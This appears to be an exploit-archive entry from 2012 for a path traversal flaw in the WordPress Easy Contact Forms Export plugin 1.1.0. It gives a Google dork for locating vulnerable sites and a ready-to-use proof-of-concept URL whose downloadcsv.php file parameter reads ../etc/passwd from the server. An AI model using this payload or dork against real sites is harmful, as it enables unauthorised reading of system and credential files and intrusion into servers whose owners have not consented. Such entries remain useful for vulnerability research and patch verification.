Wordpress Easy Contact Forms Export Plugin 1.1.0 Information Disclosure Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Wordpress Easy Contact Forms Export Plugin 1.1.0 Information Disclosure Vulnerability
# Published : 2012-06-08
# Author :
# Previous Title : PHPNet <= 1.8 (ler.php) SQL Injection
# Next Title : Wordpress Simple Download Button Shortcode Plugin 1.0 Remote File Disclosure

##################################################
# Description : Wordpress Plugins - Easy Contact Forms Export 
Information Disclosure Vulnerability
# Version : 1.1.0
# Link : http://wordpress.org/extend/easy-contact-forms-exporter/
# Plugins : 
http://downloads.wordpress.org/plugin/easy-contact-forms-exporter.zip
# Date : 26-05-2012
# Google Dork : inurl:/wp-content/plugins/easy-contact-forms-exporter/
# Author : Sammy FORGIT - sam at opensyscom dot fr - 
http://www.opensyscom.fr
##################################################

Exploit :

http://www.exemple.com/wordpress/wp-content/plugins/easy-contact-forms-exporter/downloadcsv.php?file=../etc/passwd